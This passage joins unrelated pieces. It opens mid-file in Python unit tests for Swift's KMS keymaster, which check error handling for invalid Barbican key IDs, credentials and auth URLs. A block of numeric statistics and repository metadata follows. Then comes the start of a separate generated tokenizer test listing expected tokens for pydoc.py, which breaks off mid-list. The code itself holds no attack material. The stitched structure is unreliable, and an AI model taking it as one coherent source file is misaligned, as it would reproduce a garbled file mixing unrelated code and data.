mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_INVALID_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key id invalid')
except ValueError as e:
self.assertEqual(e.message,
ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_nonexistent_key_id(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_NONEXISTENT_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key id invalid')
except Exception as e:
expected_message = ('Key not found, uuid: ' +
TEST_KMS_NONEXISTENT_KEY_ID)
self.assertEqual(e.message, expected_message)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_format(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_OPAQUE_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_config_file_and_params(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Both external config file and config parameters specified.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['keymaster_config_path'] = (
'PATH_TO_KEYMASTER_CONFIG_FILE'
)
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(self.swift, kms_conf)
raise Exception('Success even though config invalid')
except Exception as e:
expected_message = ('keymaster_config_path is set, but there are '
'other config options specified:')
self.assertTrue(e.message.startswith(expected_message),
"Error message does not start with '%s'" %
expected_message)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_username(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid username.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['username'] = 'invaliduser'
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though username invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_password(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid password.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['password'] = 'invalidpassword'
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though password invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_connect_failure_auth_url(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Connect failure kms auth_url.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['auth_endpoint'] = TEST_KMS_CONNECT_FAILURE_URL
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though auth_url invalid')
except ConnectFailure:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_bad_auth_url(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Bad kms auth_url.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['auth_endpoint'] = TEST_KMS_NON_BARBICAN_URL
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though auth_url invalid')
except DiscoveryFailure:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_bad_user_domain_name(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Bad user domain name with mocks.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['user_domain_name'] = (
TEST_KMS_INVALID_USER_DOMAIN_NAME)
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though api_version invalid')
except Unauthorized as e:
self.assertEqual(e.http_status, 401)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_algorithm(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_DES_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_length(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_SHORT_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though key format invalid')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_none_key(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Nonexistent key.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return invalid Barbican configuration parameters.
'''
kms_conf = dict(TEST_KMS_KEYMASTER_CONF)
kms_conf['key_id'] = TEST_KMS_NONE_KEY_ID
mock_readconf.return_value = kms_conf
'''
Verify that an exception is raised by the mocked function.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(
self.swift, TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF)
raise Exception('Success even though None key returned')
except ValueError:
pass
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
if __name__ == '__main__':
unittest.main()
| 42.063776
| 79
| 0.668779
| 3,729
| 32,978
| 5.549209
| 0.083937
| 0.058474
| 0.052771
| 0.09003
| 0.804717
| 0.778476
| 0.757213
| 0.739235
| 0.734306
| 0.727782
| 0
| 0.007478
| 0.249803
| 32,978
| 783
| 80
| 42.117497
| 0.828941
| 0.03566
| 0
| 0.658228
| 0
| 0
| 0.205337
| 0.149479
| 0
| 0
| 0
| 0
| 0.018083
| 1
| 0.052441
| false
| 0.124774
| 0.018083
| 0.009042
| 0.092224
| 0.019892
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a2fbb305ec54cbefe2e9ebae01a8962af04f3660
| 1,007,795
|
py
|
Python
|
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
test/python/sample/stdlib/test_pydoc.py
|
esoma/woosh
|
4cd58eb93c69c48040ff1e25159e48def54c3111
|
[
"MIT"
] | null | null | null |
# this file was generated using test/python/sample/generate.py
# python
import io
import pathlib
# pytest
import pytest
# woosh
import woosh
def tokenize_file_like(source):
return list(woosh.tokenize(io.BytesIO(source)))
def tokenize_bytes(source):
return list(woosh.tokenize(source))
SAMPLE_DIR = pathlib.Path(__file__).parent.absolute() / '../../' / '../../' / 'sample'
@pytest.mark.parametrize('tokenize', [tokenize_file_like, tokenize_bytes])
def test(tokenize):
    """Check both tokenizer entry points against the pre-computed tokens.

    Reads the sample ``stdlib/pydoc.py`` source as raw bytes, tokenizes it
    with the parametrized entry point, and compares each produced token to
    the corresponding entry of the generated EXPECTED list.
    """
    sample_path = SAMPLE_DIR / 'stdlib/pydoc.py'
    with open(sample_path, 'rb') as source_file:
        actual = tokenize(source_file.read())
    # zip pairs tokens positionally; comparison stops at the shorter sequence,
    # matching the original generated test's behavior.
    for got, want in zip(actual, EXPECTED):
        assert got == want
EXPECTED = [
woosh.Token(woosh.ENCODING, 'utf-8', 1, 0, 1, 0),
woosh.Token(woosh.COMMENT, '#!/usr/bin/env python3', 1, 0, 1, 22),
woosh.Token(woosh.STRING, '"""Generate Python documentation in HTML or text for interactive use.\r\n\r\nAt the Python interactive prompt, calling help(thing) on a Python object\r\ndocuments the object, and calling help() starts up an interactive\r\nhelp session.\r\n\r\nOr, at the shell command line outside of Python:\r\n\r\nRun "pydoc <name>" to show documentation on something. <name> may be\r\nthe name of a function, module, package, or a dotted reference to a\r\nclass or function within a module or module in a package. If the\r\nargument contains a path segment delimiter (e.g. slash on Unix,\r\nbackslash on Windows) it is treated as the path to a Python source file.\r\n\r\nRun "pydoc -k <keyword>" to search for a keyword in the synopsis lines\r\nof all available modules.\r\n\r\nRun "pydoc -n <hostname>" to start an HTTP server with the given\r\nhostname (default: localhost) on the local machine.\r\n\r\nRun "pydoc -p <port>" to start an HTTP server on the given port on the\r\nlocal machine. Port number 0 can be used to get an arbitrary unused port.\r\n\r\nRun "pydoc -b" to start an HTTP server on an arbitrary unused port and\r\nopen a Web browser to interactively browse documentation. Combine with\r\nthe -n and -p options to control the hostname and port used.\r\n\r\nRun "pydoc -w <name>" to write out the HTML documentation for a module\r\nto a file named "<name>.html".\r\n\r\nModule docs for core modules are assumed to be in\r\n\r\n https://docs.python.org/X.Y/library/\r\n\r\nThis can be overridden by setting the PYTHONDOCS environment variable\r\nto a different URL or to a local directory containing the Library\r\nReference Manual pages.\r\n"""', 2, 0, 39, 3),
woosh.Token(woosh.NEWLINE, '\r\n', 39, 3, 40, 0),
woosh.Token(woosh.NAME, '__all__', 40, 0, 40, 7),
woosh.Token(woosh.OP, '=', 40, 8, 40, 9),
woosh.Token(woosh.OP, '[', 40, 10, 40, 11),
woosh.Token(woosh.STRING, "'help'", 40, 11, 40, 17),
woosh.Token(woosh.OP, ']', 40, 17, 40, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 40, 18, 41, 0),
woosh.Token(woosh.NAME, '__author__', 41, 0, 41, 10),
woosh.Token(woosh.OP, '=', 41, 11, 41, 12),
woosh.Token(woosh.STRING, '"Ka-Ping Yee <ping@lfw.org>"', 41, 13, 41, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 41, 41, 42, 0),
woosh.Token(woosh.NAME, '__date__', 42, 0, 42, 8),
woosh.Token(woosh.OP, '=', 42, 9, 42, 10),
woosh.Token(woosh.STRING, '"26 February 2001"', 42, 11, 42, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 42, 29, 43, 0),
woosh.Token(woosh.NAME, '__credits__', 44, 0, 44, 11),
woosh.Token(woosh.OP, '=', 44, 12, 44, 13),
woosh.Token(woosh.STRING, '"""Guido van Rossum, for an excellent programming language.\r\nTommy Burnette, the original creator of manpy.\r\nPaul Prescod, for all his work on onlinehelp.\r\nRichard Chamberlain, for the first implementation of textdoc.\r\n"""', 44, 14, 48, 3),
woosh.Token(woosh.NEWLINE, '\r\n', 48, 3, 49, 0),
woosh.Token(woosh.COMMENT, "# Known bugs that can't be fixed here:", 50, 0, 50, 38),
woosh.Token(woosh.COMMENT, '# - synopsis() cannot be prevented from clobbering existing', 51, 0, 51, 61),
woosh.Token(woosh.COMMENT, '# loaded modules.', 52, 0, 52, 21),
woosh.Token(woosh.COMMENT, '# - If the __file__ attribute on a module is a relative path and', 53, 0, 53, 66),
woosh.Token(woosh.COMMENT, '# the current directory is changed with os.chdir(), an incorrect', 54, 0, 54, 68),
woosh.Token(woosh.COMMENT, '# path will be displayed.', 55, 0, 55, 29),
woosh.Token(woosh.NAME, 'import', 57, 0, 57, 6),
woosh.Token(woosh.NAME, 'builtins', 57, 7, 57, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 57, 15, 58, 0),
woosh.Token(woosh.NAME, 'import', 58, 0, 58, 6),
woosh.Token(woosh.NAME, 'importlib', 58, 7, 58, 16),
woosh.Token(woosh.OP, '.', 58, 16, 58, 17),
woosh.Token(woosh.NAME, '_bootstrap', 58, 17, 58, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 58, 27, 59, 0),
woosh.Token(woosh.NAME, 'import', 59, 0, 59, 6),
woosh.Token(woosh.NAME, 'importlib', 59, 7, 59, 16),
woosh.Token(woosh.OP, '.', 59, 16, 59, 17),
woosh.Token(woosh.NAME, '_bootstrap_external', 59, 17, 59, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 59, 36, 60, 0),
woosh.Token(woosh.NAME, 'import', 60, 0, 60, 6),
woosh.Token(woosh.NAME, 'importlib', 60, 7, 60, 16),
woosh.Token(woosh.OP, '.', 60, 16, 60, 17),
woosh.Token(woosh.NAME, 'machinery', 60, 17, 60, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 60, 26, 61, 0),
woosh.Token(woosh.NAME, 'import', 61, 0, 61, 6),
woosh.Token(woosh.NAME, 'importlib', 61, 7, 61, 16),
woosh.Token(woosh.OP, '.', 61, 16, 61, 17),
woosh.Token(woosh.NAME, 'util', 61, 17, 61, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 61, 21, 62, 0),
woosh.Token(woosh.NAME, 'import', 62, 0, 62, 6),
woosh.Token(woosh.NAME, 'inspect', 62, 7, 62, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 62, 14, 63, 0),
woosh.Token(woosh.NAME, 'import', 63, 0, 63, 6),
woosh.Token(woosh.NAME, 'io', 63, 7, 63, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 63, 9, 64, 0),
woosh.Token(woosh.NAME, 'import', 64, 0, 64, 6),
woosh.Token(woosh.NAME, 'os', 64, 7, 64, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 64, 9, 65, 0),
woosh.Token(woosh.NAME, 'import', 65, 0, 65, 6),
woosh.Token(woosh.NAME, 'pkgutil', 65, 7, 65, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 65, 14, 66, 0),
woosh.Token(woosh.NAME, 'import', 66, 0, 66, 6),
woosh.Token(woosh.NAME, 'platform', 66, 7, 66, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 66, 15, 67, 0),
woosh.Token(woosh.NAME, 'import', 67, 0, 67, 6),
woosh.Token(woosh.NAME, 're', 67, 7, 67, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 67, 9, 68, 0),
woosh.Token(woosh.NAME, 'import', 68, 0, 68, 6),
woosh.Token(woosh.NAME, 'sys', 68, 7, 68, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 68, 10, 69, 0),
woosh.Token(woosh.NAME, 'import', 69, 0, 69, 6),
woosh.Token(woosh.NAME, 'sysconfig', 69, 7, 69, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 69, 16, 70, 0),
woosh.Token(woosh.NAME, 'import', 70, 0, 70, 6),
woosh.Token(woosh.NAME, 'time', 70, 7, 70, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 70, 11, 71, 0),
woosh.Token(woosh.NAME, 'import', 71, 0, 71, 6),
woosh.Token(woosh.NAME, 'tokenize', 71, 7, 71, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 71, 15, 72, 0),
woosh.Token(woosh.NAME, 'import', 72, 0, 72, 6),
woosh.Token(woosh.NAME, 'urllib', 72, 7, 72, 13),
woosh.Token(woosh.OP, '.', 72, 13, 72, 14),
woosh.Token(woosh.NAME, 'parse', 72, 14, 72, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 72, 19, 73, 0),
woosh.Token(woosh.NAME, 'import', 73, 0, 73, 6),
woosh.Token(woosh.NAME, 'warnings', 73, 7, 73, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 73, 15, 74, 0),
woosh.Token(woosh.NAME, 'from', 74, 0, 74, 4),
woosh.Token(woosh.NAME, 'collections', 74, 5, 74, 16),
woosh.Token(woosh.NAME, 'import', 74, 17, 74, 23),
woosh.Token(woosh.NAME, 'deque', 74, 24, 74, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 74, 29, 75, 0),
woosh.Token(woosh.NAME, 'from', 75, 0, 75, 4),
woosh.Token(woosh.NAME, 'reprlib', 75, 5, 75, 12),
woosh.Token(woosh.NAME, 'import', 75, 13, 75, 19),
woosh.Token(woosh.NAME, 'Repr', 75, 20, 75, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 75, 24, 76, 0),
woosh.Token(woosh.NAME, 'from', 76, 0, 76, 4),
woosh.Token(woosh.NAME, 'traceback', 76, 5, 76, 14),
woosh.Token(woosh.NAME, 'import', 76, 15, 76, 21),
woosh.Token(woosh.NAME, 'format_exception_only', 76, 22, 76, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 76, 43, 77, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------------------------- common routines', 79, 0, 79, 75),
woosh.Token(woosh.NAME, 'def', 81, 0, 81, 3),
woosh.Token(woosh.NAME, 'pathdirs', 81, 4, 81, 12),
woosh.Token(woosh.OP, '(', 81, 12, 81, 13),
woosh.Token(woosh.OP, ')', 81, 13, 81, 14),
woosh.Token(woosh.OP, ':', 81, 14, 81, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 81, 15, 82, 0),
woosh.Token(woosh.INDENT, ' ', 82, 0, 82, 4),
woosh.Token(woosh.STRING, '"""Convert sys.path into a list of absolute, existing, unique paths."""', 82, 4, 82, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 82, 75, 83, 0),
woosh.Token(woosh.NAME, 'dirs', 83, 4, 83, 8),
woosh.Token(woosh.OP, '=', 83, 9, 83, 10),
woosh.Token(woosh.OP, '[', 83, 11, 83, 12),
woosh.Token(woosh.OP, ']', 83, 12, 83, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 83, 13, 84, 0),
woosh.Token(woosh.NAME, 'normdirs', 84, 4, 84, 12),
woosh.Token(woosh.OP, '=', 84, 13, 84, 14),
woosh.Token(woosh.OP, '[', 84, 15, 84, 16),
woosh.Token(woosh.OP, ']', 84, 16, 84, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 84, 17, 85, 0),
woosh.Token(woosh.NAME, 'for', 85, 4, 85, 7),
woosh.Token(woosh.NAME, 'dir', 85, 8, 85, 11),
woosh.Token(woosh.NAME, 'in', 85, 12, 85, 14),
woosh.Token(woosh.NAME, 'sys', 85, 15, 85, 18),
woosh.Token(woosh.OP, '.', 85, 18, 85, 19),
woosh.Token(woosh.NAME, 'path', 85, 19, 85, 23),
woosh.Token(woosh.OP, ':', 85, 23, 85, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 85, 24, 86, 0),
woosh.Token(woosh.INDENT, ' ', 86, 0, 86, 8),
woosh.Token(woosh.NAME, 'dir', 86, 8, 86, 11),
woosh.Token(woosh.OP, '=', 86, 12, 86, 13),
woosh.Token(woosh.NAME, 'os', 86, 14, 86, 16),
woosh.Token(woosh.OP, '.', 86, 16, 86, 17),
woosh.Token(woosh.NAME, 'path', 86, 17, 86, 21),
woosh.Token(woosh.OP, '.', 86, 21, 86, 22),
woosh.Token(woosh.NAME, 'abspath', 86, 22, 86, 29),
woosh.Token(woosh.OP, '(', 86, 29, 86, 30),
woosh.Token(woosh.NAME, 'dir', 86, 30, 86, 33),
woosh.Token(woosh.NAME, 'or', 86, 34, 86, 36),
woosh.Token(woosh.STRING, "'.'", 86, 37, 86, 40),
woosh.Token(woosh.OP, ')', 86, 40, 86, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 86, 41, 87, 0),
woosh.Token(woosh.NAME, 'normdir', 87, 8, 87, 15),
woosh.Token(woosh.OP, '=', 87, 16, 87, 17),
